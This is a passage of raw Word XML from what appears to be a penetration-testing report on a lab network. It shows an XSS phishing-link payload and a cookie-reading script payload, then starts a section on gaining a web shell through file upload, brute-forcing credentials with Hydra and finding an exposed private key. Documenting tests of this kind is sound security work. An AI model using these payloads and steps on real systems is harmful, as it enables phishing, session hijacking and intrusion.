          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00047D2A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>flaw as shown in Image 5.6. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tester demonstrated practical exploitation by injecting a phishing link, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5992302B" w14:textId="406631BF" w:rsidR="00FE7E01" w:rsidRPr="00D77DFE" w:rsidRDefault="008F2EC9" w:rsidP="00785E85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00785E85">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;a href="http://IP_Address"&gt;Facebook Login&lt;/a&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, redirecting users to a fake login page</w:t>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="146" w:name="paragraph86"/>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource86"</w:instrText>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.67</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="009D4A0A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E33FC0" w14:textId="6542DC34" w:rsidR="00BF7CF7" w:rsidRPr="00D77DFE" w:rsidRDefault="008F2EC9" w:rsidP="00123285">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Session data could also be extracted; the payload </w:t>
      </w:r>
      <w:r w:rsidRPr="001917CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001917CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001917CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001917CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">revealed the session </w:t>
      </w:r>
      <w:r w:rsidR="00047D2A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>identifier</w:t>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="147" w:name="paragraph87"/>
      <w:r w:rsidR="00AB5D85" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00AB5D85" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource87"</w:instrText>
      </w:r>
      <w:r w:rsidR="00AB5D85" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AB5D85" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003A258B" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.68</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
      <w:r w:rsidR="00AB5D85"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00047D2A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>. While</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the current system lacks user accounts, this vulnerability would enable session hijacking and user impersonation in a production environment.</w:t>
      </w:r>
      <w:r w:rsidR="00BF7CF7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57435E51" w14:textId="7D72D85C" w:rsidR="008F2EC9" w:rsidRPr="00D77DFE" w:rsidRDefault="00BF7CF7" w:rsidP="00047D2A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EBC2665" wp14:editId="0E7D5150">
            <wp:extent cx="4532253" cy="807523"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="204379516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95163" name="Picture 21" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5069372" cy="903223"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF511F" w14:textId="67A8AB15" w:rsidR="000635BE" w:rsidRPr="00D77DFE" w:rsidRDefault="0025388A" w:rsidP="00A6587D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Image 5.6: Reflected XSS in search field</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437050F7" w14:textId="77777777" w:rsidR="00A6587D" w:rsidRPr="00D77DFE" w:rsidRDefault="00A6587D" w:rsidP="00A6587D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B20A361" w14:textId="2A979AC6" w:rsidR="00BF7B5A" w:rsidRPr="00D77DFE" w:rsidRDefault="00545188" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc223521135"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00A23156" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DD5501" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF7B5A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing Unrestricted File Upload for Remote Code </w:t>
      </w:r>
      <w:r w:rsidR="00754BB3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BF7B5A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Execution and Internal Pivoting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="3AEF1963" w14:textId="662E3F11" w:rsidR="009F3B86" w:rsidRPr="00D77DFE" w:rsidRDefault="009F3B86" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The tester targets ServerMeta (10.0.3.190) from the Kali host</w:t>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>and exploits a file</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>upload vulnerability to gain a web shell as www</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="0073768A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="149" w:name="paragraph88"/>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource88"</w:instrText>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.69</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkStart w:id="150" w:name="paragraph89"/>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink w:anchor="resource89" w:history="1">
        <w:r w:rsidR="0073768A" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>Figure A.</w:t>
        </w:r>
        <w:r w:rsidR="009E181E" w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>70</w:t>
        </w:r>
        <w:bookmarkEnd w:id="150"/>
      </w:hyperlink>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:bookmarkStart w:id="151" w:name="paragraph90"/>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource90"</w:instrText>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005D4C66" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.71</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
      <w:r w:rsidR="005D4C66"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xml:space="preserve">, later escalating to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> user through weak credentials</w:t>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Hydra as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="152" w:name="paragraph91"/>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource91"</w:instrText>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.72</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
      <w:r w:rsidR="003D4AE4"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Enumeration reveals an SSH key reference in authorized_keys</w:t>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="153" w:name="paragraph92"/>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource92"</w:instrText>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.73</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
      <w:r w:rsidR="003D4AE4"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leading to the discovery of the world</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t xml:space="preserve">readable private key key_Zain.pem in </w:t>
      </w:r>
      <w:r w:rsidRPr="001917CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/home/public/</w:t>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="001917CF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="154" w:name="paragraph93"/>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003D4AE4" w:rsidRPr="00D77DFE">
        <w:rPr>
